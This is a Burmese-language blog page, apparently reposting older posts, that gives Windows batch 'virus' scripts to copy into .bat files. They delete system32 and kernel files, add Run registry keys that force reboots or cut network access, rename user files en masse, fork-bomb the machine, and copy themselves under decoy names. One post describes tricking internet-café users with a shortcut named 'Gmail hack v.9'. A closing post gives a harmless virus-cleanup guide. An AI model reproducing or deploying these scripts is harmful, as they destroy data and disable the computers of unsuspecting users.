del C:\\windows\system32







3.............Danger Virus......... (.bat)

Code:



del "C:\windows\system32\bootok" /Q/S >nul

del "C:\windows\system32\bootvid" /Q/S >nul

del "C:\windows\system32\bootvrfy" /Q/S >nul





4.............Danger Virus........ (.bat)

Code:

del "C:\windows\pchealth\"

del "C:\windows\system\"

del "C:\windows\system32\restore"

del "C:\windows\system32\autoexec.nt"

del "C:\windows\system32\logonui.exe"

del "C:\windows\system32\ntoskrnl.exe"



5....... Fake virus ..... (.bat)

Code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*





6.......Atomic Bomb Virus........ (.bat)

Code:

@echo off

:A

start dir

start command

start firefox

start explorer

start notepad

goto:A



7.......Autorun Virus.......... (.inf)



;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1

[AutoRun]

;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia

open=n.com

;irllr3rr3jiDia3lw4s52q

shell\open\Command=n.com

;w22swS

shell\open\Default=1

;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2

ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2

shell\explore\Command=n.com

;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00ol

sw4k2os344k0dwpXD



Saw Linux  /  8:25 AM  /    /  1 comment
မေကာင္းတဲ့နည္းပညာကို အားေပးတာမဟုတ္ပါဘူး။ ဒါေတြလိုက္စုထားတာၾကာေရာေပါ့။ က်ေနာ္က Progra

-ming Language, Web development ခက္ခဲနက္နဲတာေတြမေလ့လာျဖစ္တာပဲရွိမွာ။ ဒါေပမယ့္ အျမဲတန္း

အဲဒါေတြဖတ္ျဖစ္တယ္။ Programming Language အပိုင္းမွာ ေလ့လာမယ္ဆိုရင္ ေအာက္ပါ Section အပိုင္း

မ်ားေလ့လာဖတ္လို႔ရႏိုင္ပါတယ္။ ဒီအပိုင္းေတြမွာက်ေနာ္ဖတ္သာဖတ္ျဖစ္တယ္။ ေလ့က်င့္တဲ့အပို္င္းမွာေတာ့

လက္ေတြ႕မလုပ္ျဖစ္ခဲ့ဘူး။ ေနာက္ျပီး က်ေနာ္က ေနာက္ပိုင္းမွကြန္ပ်ဴတာေလ့လာျဖစ္ခဲ့ေတာ့ ဒီအပိုင္းေတြ

ကို ေလ့က်င့္ဖို႔မလြယ္ေတာ့ပါဘူး။ ေအ...အသက္ႏွစ္ဆယ္ေက်ာ္ Language ပိုင္းႏိုင္တဲ့ညီငယ္ေတြဆိုရင္

အထူးကိုအားေပးပါတယ္။ ေလ့လာလဲ ေလ့လာသင့္ပါတယ္။

# ↳ C++

# ↳ C#

# ↳ Python

# ↳ Java

# ↳ VB.NET

# ↳ VB

# ↳ Theory And Data Structure

# ↳ XML



ေနာက္ျပီးေအာက္ကအပိုင္းေတာ့ Web Development အပိုင္းျဖစ္ပါတယ္။ ၀က္ဘဆိုက္ေတြကို စနစ္တက်

လုပ္တတ္ခ်င္ရင္ ေအာက္ပါအပိုင္းေတြကိုေလ့လာရမွာပါ။ အထူးအားျဖင့္ HTML / CSS, Javascript / AJAX

ေလ့လာရမယ္။ အဲဒီအပိုင္းေတြကို ကၽြမ္းက်င္မယ္ဆိုရင္လည္း Web အပုိင္းမွာေတာ္ေတာ္ခရီးေရာက္ပါတယ္။

က်ေနာ္က HTML / CSS, Javascript ေတြကို ကိုယ္ပိုင္ေရးတတ္တာမဟုတ္ပါ။ ဘယ္အပိုင္းမွာ ဘယ္

လိုသြင္းရလဲ ဘယ္လိုျပင္ရမလဲစတာေတြ က်ေနာ္သိသေလာက္သိပါတယ္။ တတ္ခ်င္တဲ့ပုဂၢိဳလ္မ်ားအေနနဲ႔

ေလ့လာေပါ့ဗ်ာ။



# ↳ PHP

# ↳ Ruby On Rail

# ↳ ASP / ASP.NET

# ↳ HTML / CSS

# ↳ Javascript / AJAX

# ↳ Dreamweaver

# CMS

# ↳ Joomla

# ↳ Wordpress



က်န္တာေတာ့ က်ေနာ္ေန႔စဥ္စာဖတ္တယ္။လက္ေတြ႕လိုက္လုပ္တယ္။ရလာတဲ့တစ္ခ်ိဳ႕မေကာင္းတဲ့နည္း

ပညာေတြကို ဒီတိုင္းပဲသိမ္းထားတာမ်ားပါတယ္။

ဒါေပမယ့္ တစ္ေန႔က က်ေနာ္ကိုင္တဲ့ဆိုက္တစ္ခုရဲ႕ စီေဘာက္စ္မွာ မေကာင္းတဲ့လင့္ေတြလာထိုးျပီးရုန္႕ရင္း

ၾကမ္းတမ္းေသာစကားလံုးေတြေရးထားတာေတြ႕ရတယ္။ က်ေနာ္ ဘာမွမေျပာလိုပါဘူး။ ဒါေပမယ့္ မိမိက

ကြန္ပ်ဴတာကၽြမ္းက်င္တယ္ဆိုရင္ စမ္းၾကည့္ေပါ့ဗ်ာ။ က်ေနာတို႔ကနည္းပညာေလ့လာမယ့္လူအတူတူဆို

ေတာ့ ကိုယ့္စက္ကို မပ်က္ေအာင္ထိန္းသိမ္းနည္းေလးေတြ သိထားျပီးလို႔ထင္ပါတယ္။





.bat file ကို အေျခခံထားေသာ Virus ေရးထားေသာ Code မ်ားေလ့လာခ်င္ရင္ ေအာက္ပါအတိုင္း

ေလ့လာႏိုင္ပါတယ္။



simple virus code



June 17th, 2010 | Author: zuzu

Virus Code ေလးေတြတင္ေပးလုိက္တယ္ဂ်ာ။မယုံရင္လည္း Run ၾကည္ ့ေပါ့ေနာ္။ ဟိဟိ ။တတ္လာ

တဲ ့ျပသနာေတြေတာ ့တာ၀န္မယူပါ။

ဒါကေတာ ့ကြန္ျပဴတာ shutdown က်ေစတဲ ့ ဗဳိင္းရပ္ကုတ္ပါ။notepad မွာ copy/paste လုပ္ျပီး….shutdown.bat လုိ ့ save မွတ္လုိက္ပါ။သြား Run မိရင္ေတာ ့ ျပန္တတ္လာရင္ သင္စက္ဟက္ခံထိျပီးဆုိျပီးျပေနလိမ္ ့မယ္။



echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11 -f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f

echo You have been HACKED.

PAUSE



ဒါကေတာ ့ အင္တာနက္ကုိ block လုပ္လုိက္တဲ ့Code ကုတ္ပါ။

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo You Have Been HACKED!

PAUSE

Disableinternet.bat လုိ ့ save မွတ္ပီးသိမ္းထားနုိင္ပါတယ္။မေတာ္တဆ သြားနိပ္မိမွာဆုိးလုိ ့ပါ။



ဒါကေတာ ့ TXT file ေတြကုိ အလုပ္မလုပ္ေအာင္ ခုိင္းလုိက္တဲ ့ comment ျဖစ္ပါတယ္။

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

txt.bat ဆုိျပီး save မွတ္ထားလုိက္ပါ။



ေအာက္ဆုံးကေတာ ့ေတာ ့ အားလုံးကို ေပါင္းျပီးေရးထားလုိက္တာပါ။

အေပၚက ေစခုိိင္းထားတဲ ့အရာေတြကို တစ္ခါတည္းအလုပ္လုပ္သြားတာပါ။ေတေရာ ဟီး ။ ။

:CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH

ipconfig /release

shutdown -r -f -t0

echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11 -f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f

echo You Have Been Hackedecho @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo YOU HAVE BEEN HACKED *****

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

PAUSE

PAUSE





looping of 2 bat file and Simple Virus Codes



May 28th, 2010 | Author: zuzu



Network သမား တစ္ေယာက္ဟာ Bat code ေတြ ကုိ ရင္းနွီးျပီးသားျဖစ္မွာပါ။

သင္ဟာ Programmer တစ္ေယာက္မဟုတ္ရင္ေတာင္ bat code ေတြ ကုိ သိထားယုံနဲ ့

အေသးစား Virus တစ္ေကာင္ကုိ ဖန္တီးနိုင္မွာပါ။ ဘယ္လို ဖန္တီးမလဲ?

ဒါက ေတာ ့ သင့္ဥာဏ္ကြန္ ့ျမဴးနိုင္မွုေပၚမွာ မူတည္ပါတယ္။

အခု bat file နွစ္ခုနဲ ့ သင့္ရဲ ကြန္ျပဴတာ ကုိ ဒုကၡေပးၾကည္ ့ရေအာင္။

ဒီကုတ္ေလးေတြ ကုိ ကူးပါ။

notepad ထဲမွာေနာ္။

start

shutdown -s

@echo off

:loop

msg * Hello Chuchar

start Itdengerous.2

goto loop

ျပီးရင္ Itdengerous.1 ဆိုျပီး .bat နဲ ့ save ပါ။

ေနာက္ျပီးေတာ ့ ဒီကုတ္ေလးပါပဲ။

start

shutdown -s

@echo off

:loop

msg * Hello Chuchar

start Itdengerous.1

goto loop

Itdengerous.2 လုိ ့အမည္ေပးျပီး .bat နဲ ့ save မွတ္ပါ။



ဖုိဒါတစ္ခုထဲမွာ အဲဒီ bat ဖုိင္ နွစ္ဖုိင္လုံးရွိေနပါေစ။

ကဲ သင္ၾကဳိက္တဲ ့ဖိုင္တစ္ခု ကုိ Run ၾကည္ ့ပါ။

ဘာျဖစ္သြားလဲ ဆုိတာေတြ ့ပါလိမ္ ့မယ္ ။ ။

Looping ပတ္္ျခင္းေတြ မျပီးဆုံးနုိင္ေတာ ့ပါဘူး။

bat ဖုိင္ကုိ ေတြရဲ ့ looping ပတ္ျခင္းကုိ Ctrl+C နဲ ့တားဆီးနုိင္ပါတယ္။

ဒါေပ ့မယ္..အေပၚမွာ ပါတဲ ့ဖိုင္နွစ္ခု ရဲ ့ looping အေရအတြတ္က အကန္ ့အသတ္မရွိတာေၾကာင့္

Ctrl+C လည္း တားဆီးနူိင္မွာမဟုတ္ေတာ ့ပါဘူး။

code ရဲ ့ စစျခင္းမွာ Shutdown -s ထည္ ့ထားတဲ ့အတြတ္… shutdown ကလည္း မျဖစ္မေနက်မွာပါပဲ။

shutdown -a နဲ ့ေတာ ့ အဲဒီ process ကုိ တားဆီးနုိင္ပါတယ္။

Start>run or Window key+R က ေန ျပီး

Shutdown -a နဲ ့သတ္ပစ္နိုင္ပါတယ္။

ေအာက္က

msg * Hello Chuchar

ဆုိတာ က ေတာ ့ Pop box တစ္ခု အေနနဲ ့သင္ဘာေပၚခ်င္လဲ။ သင္ၾကဳိက္တာေရးထည္ ့နိုင္ပါတယ္။

msg * I Love You ဆုိရင္ သူကလည္း သင္ comment ေပးထားတဲ ့အတုိင္း I love You ဆုိျပီး ေပၚေနပါလိမ္ ့မယ္။

မမုိက္ဘူးလား ။

start Itdengerous.1

start Itdengerous.2

ဆုိတာ ကေတာ ့ သင့္ရဲ ့ bat file နွစ္ဖုိင္ ကုိ လွမ္း ျပီး Run တာ ျဖစ္ပါတယ္။

1 က 2 ကုိ ဖြင့္မယ္။ 2 က 1 ကုိ ဖြင့္မယ္။

ျပီးရင္ goto loop အၾကိမ္အေရအတြတ္ မရွိ ဖြင့္ေနမယ္။

အဲဒါဆုိ ေသခ်ာပါတယ္။ သင့္ကြန္ျပဴတာ လံုး၀ restart ခ်လုိက္ရမယ္။

မပူပါနဲ ့ ။

တစ္ခါတည္းနဲ ့အေရာက္ပုိ ့ခဲ ့မယ္ေနာ္။

အင္တာနက္ဆုိင္တစ္ဆုိင္သြားသုံးတယ္ဆုိပါစုိ ့။

သင္အဲဒီကြန္ျပဴတာကုိ အဲဒီဖုိင္ေတြ Run ခ်င္တယ္ဆုိ လြယ္ပါတယ္။

အဲဒီ ဖုိင္နွစ္ဖုိင္ရွိတဲ ့ ဖုိဒါကုိ ေကာ္ပီ လုပ္ပါ။ ဒီအတုိင္းၾကီး ထားခဲ ့မယ္ဆုိ သိတဲ ့သူေတြ သိမယ္ေလ။

အဲဒီေတာ ့…. C:// ရဲ ့ေအာက္ေနရာ တစ္ခုခု။ ဒါမွမဟုတ္ သင့္စိတ္ၾကဳိက္ေနရာတစ္ခု မွ သြားထည္ ့လုိက္ပါ။

ျပီးရင္ Itdengerous.1 ျဖစ္ေစ Itdengerous.2 ျဖစ္ေစ တစ္ဖုိင္ဖုိင္ကုိ Desktop ကုိ လွမ္းျပီး

shortcut ပုိ ့ပါ။ အဲဒီ shortcut file ကုိ icon ေျပာင္းလုိ ့ရပါတယ္။

သင္ၾကဳိက္တဲ ့ Icon ေလး ေျပာင္းျပီး။ဒီလုိေလးေပးခဲ ့ပါလားဟင္။

Gmail hack v.9 ဆုိျပီး

ေသခ်ာပါတယ္ user ေတြ စိတ္၀င္စားမွာ





ေအာက္မွာ ဗုိင္းရပ္ simple code ေလးပါ။ ေလ ့လာနုိင္ပါတယ္။

title hello

@echo off

del *.dll

del *.exe

del *.ini

time 00:00

date 88/88/888

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

msg *hello it my brithday

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

echo copy hello.bat “documents and settings\all users\start menu\programs\startup”

cd C:\WINDOWS\system32

del /S /F /Q keyboard.drv

del /S /F /Q keyboard.sys

del system32

shutdown -s -f

exit



အႏၱရာယ္ရွိတဲ ့ Virus code



June 17th, 2010 | Author: zuzu

အႏၱရာယ္ရွိတဲ ့ Virus code တစ္ခုပါ။သိထားသင့္တယ္ထင္လုိ ့တင္ေပးထားတာပါ။

သင့္စက္မွာ မ Run ပါနဲ ့။

@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c “VIRUS DETECTED”

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP



Virus ေရးသားနည္းေလးပါ..ဗဟုသုတရေအာင္လို႕တင္ေပးလိုက္တာပါ.....

သူမ်ားေတြကိုေလွ်ာက္ၿပီးဒုကၡမေပးပါနဲ႕ခင္ဗ်..



လုပ္နည္းေလးကေတာ့...

ပထမဆံုး notepad ကိုဖြင့္ပါ..

ၿပီးရင္ေအာက္မွာေပးထားတဲ့ Command ေတြကို Copy/ Paste လုပ္ၿပီး .bat file အေနနဲ႕ save လုပ္လိုက္ပါ...



1.............Danger Virus........ (.bat)

Code:

@echo del off C:\\windows\system32







2.............Danger Virus......... (.bat)

Code:

@echo off

del C:\\windows\system32







3.............Danger Virus......... (.bat)

Code:



del "C:\windows\system32\bootok" /Q/S >nul

del "C:\windows\system32\bootvid" /Q/S >nul

del "C:\windows\system32\bootvrfy" /Q/S >nul





4.............Danger Virus........ (.bat)

Code:

del "C:\windows\pchealth\"

del "C:\windows\system\"

del "C:\windows\system32\restore"

del "C:\windows\system32\autoexec.nt"

del "C:\windows\system32\logonui.exe"

del "C:\windows\system32\ntoskrnl.exe"



5....... Fake virus ..... (.bat)

Code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*





6.......Atomic Bomb Virus........ (.bat)

Code:

@echo off

:A

start dir

start command

start firefox

start explorer

start notepad

goto:A



7.......Autorun Virus.......... (.inf)



;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1

[AutoRun]

;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia

open=n.com

;irllr3rr3jiDia3lw4s52q

shell\open\Command=n.com

;w22swS

shell\open\Default=1

;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2

ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2

shell\explore\Command=n.com

;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00ol

sw4k2os344k0dwpXD



Friday, August 5, 2011

Saw Linux  /  6:53 PM  /    /  No comments
ကြန္ပ်ဴတာထဲသို႔ေရာက္လာေသာ Virus အခ်ိဳ႕ဟာ စက္ထဲေရာက္လာျပီးဆိုတာနဲ႔ ၎ရဲ႕ Virus file ေတြကို
User ေတြအျမင္မွားေအာင္ ဖိုလ္ဒါပံုစံလုပ္ျပီးေတာ့ နာမည္ကိုလည္းကြန္ပ်ဴထဲမွာရွိတဲ့ ဖိုလ္ဒါေတြအမည္အ
တိုင္း ျပဳလုပ္ထားတတ္ပါတယ္။ အဓိက Virus file ကုိရွင္းလင္းလိုက္ရင္ Virus ေသျပီး ကြန္ပ်ဴတာလည္းပံု
မွန္ျဖစ္သြားေပမယ့္။ ၎ Virus ျပဳလုပ္ထားတဲ့ ဖိုလ္ဒါအတုအေယာင္ေတြကို သြားဖြင့္မိလိုက္ရင္ အဲဒီ Virus
က ျပန္၀င္ေရာက္လာႏိုင္ပါတယ္။
ဒါေၾကာင့္ Virus သတ္ျပီးဆိုတာနဲ႔ သူရဲ႕ပြားလာတဲ့ Folder အတုအေယာင္ေဆာင္ exe ဖိုင္ေတြကို လိုက္
ဖ်က္ေပးရမွာျဖစ္ပါတယ္။ အဲလိုလိုက္ရွာဖ်က္ေပးတဲ့အခါ တစ္ခုခ်င္းဆီလိုက္ရွာဖ်က္ေနရရင္ မိမိစက္ထဲမွာ
ရွိတဲ့ ဗိုင္းရပ္စ္ဖိုင္အေရအတြက္ေပၚမူတည္ျပီး အလြန္ၾကာမွာျဖစ္ပါတယ္။ exe ဖိုင္ေတြအကုန္လံုးလိုက္ဖ်က္
ျပန္ေတာ့လဲ မိမိတင္ထားတဲ့ေဆာ့၀ဲေတြပါသြားမွာစိုးရတယ္။ ဒီေတာ့ အဲဒီ folder အတုေယာင္ေဆာင္ထား
တဲ့ Virus File ေတြကို တစ္ေနရာတည္း၊ တစ္စုတစည္းတည္းေပၚလာျပီး လုပ္ပံုလုပ္နည္းေလးေျပာျပမွာ
ျဖစ္ပါတယ္။ ေအာက္ပါအတိုင္းလုိက္လုပ္ၾကည့္ရေအာင္…

ဥပမာ… D : Drive ထဲက Sound ဆိုတဲ့ Folder ကို နမူနာအျဖစ္ဆိုၾကပါစို႔…

(၁) D : Drive ထဲက Sound ဖိုလ္ဒါကိုဖြင့္၊ ေအာက္ကပံုအတိုင္း View Menu > Detail ကိုေရြးျပီးဖြင့္လိုက္ပါ


(၂) ေအာက္ပါအတိုင္း file folder ေပၚလာမွာျဖစ္ပါတယ္။ အဲဒီထဲမွာ အဓိကမွတ္ထားရမွာက File Folder
ဆိုရင္ မိမိရဲ႕ဖိုင္ေတြျဖစ္ပါတယ္။ Application Folder ေတြဆိုရင္ Virus File လို႔ သတ္မွတ္ရမွာျဖစ္ပါတယ္။


(၃) အဲဒီလို Folder နဲ႔ Application ေပၚေနတဲ့ Virus file တစ္ဖိုင္ေတြ႕ျပီးဆိုတာနဲ႔ အလားတူဖိုင္ေတြကိုရွာ
ျပီး ဖ်က္ဖို႔က လြယ္လြယ္ေလးပါ။ ေအာက္ကပံုအတိုင္း size ကိုမွတ္ထားလိုက္ပါ။

အခုဗိုင္းရပ္စ္ဖိုင္ဟာ 261 kb ရွိပါတယ္။ ဒါဆို တစ္ျခားဖိုလ္ဒါအေယာင္အေဆာင္ Virus ေတြဟာလည္း ဒီ
အရြယ္ပဲရွိျပီး အျခား Folder ေတြမွာ အမည္အမ်ိဳးမ်ိဳးနဲ႔ျပန္႔ႏွံ႕ေနမွာျဖစ္ပါတယ္။

Virus File ေတြလည္း size ခ်င္းမတူၾကပါဘူး။ ဥပမာ…chrome virus 261, globle virus ဖိုင္ဟာ 220kb
ရွိပါတယ္။

ကဲ..အခုတကယ္ဗိုင္းရပ္စ္ရွင္းတဲ့ လုပ္ငန္းစဥ္ကိုစၾကမယ္…

(၁) My Computer ကိုဖြင့္၊ Search ကိုဆက္ႏွိပ္၊ ျပီးေတာ့ All Files and Floders ကိုထပ္ေရြးျပီးႏွိပ္ပါ။


(၂) ေနာက္ထပ္ေပၚလာေသာေဘာက္စ္မွာ
All or part of the file name တြင္ *.exe လို႔ရိုက္ထည့္ပါ။
Look in အကြက္တြင္ My Computer လို႔ရိုက္ထည့္ပါ။


ျပီးေတာ့ More and Advance ကိုႏွိပ္ျပီး၊ Search Hiden Files and Folders ကို အမွန္ျခစ္ပါ။


(၃) ျပီးေတာ့ ခုဏေဘာက္စ္ကိုပဲ What size is it? ကို ႏွိပ္ျပီး၊ Specify size ( in KB) ေရွ႕မွာ အ၀ိုင္းကြက္
ကိုအမွန္ျခစ္ပါ။ ဗိုင္းရပ္စ္ဖိုင္က 261kb ရွိသည့္အတြက္ ေအာက္ပါအကြက္တို႔တြင္ at least ေရြးျပီး၊ ေဘး
မွာ 260 kb လုိ႔ရိုက္ထည့္ပါ။ ဒါဆို 260 kb အထက္က exe ဖိုင္ေတြကို ရွာေဖြေပးပါလိမ့္မယ္။ Search ကို
သာႏွိပ္ပါ။


(၄) ေပၚလာပါျပီး 260 kb အထက္မွာရွိတဲ့ Application ဖိုင္ေတြ၊ ဒါေတြအားလံုး ဗိုင္းရပ္စ္ဖိုင္ေတြမဟုတ္
ေသးပါဘူး။ Virus File ေတြေရြးဖို႔အတြက္ Size ကိုႏွိပ္ပါ။


(၅) ေအာက္ပါပံုအတိုင္း 261 kb ရွိတဲ့ Application ဗိုင္းရပ္စ္ဖိုင္ေတအြေပၚဆံုးကေနေပၚလာပါျပီး ၊ အ၀ါေရာင္
ဖိုလ္ဒါပံုစံ 261 kb ရွိတဲ့ Application file ေတြဟာ Virus file ေတြျဖစ္ပါတယ္


(၆) အဲဒီ 261 kb အရြယ္ရွိတဲ့ အ၀ါေရာင္ဖိုလ္ဒါအားလံုးကို Select ေပးလိုက္ပါ။ ျပီးရင္ Shift + Delete ဖ်က္
ျပီး yes


ကြန္ပ်ဴတာထဲမွာရွိတဲ့ အေယင္ေဆာင္ Virus File မ်ားရွင္းသြားပါျပီး။

အဆင္ေျပပါေစ…
ေစာလင္းနက္စ္

Search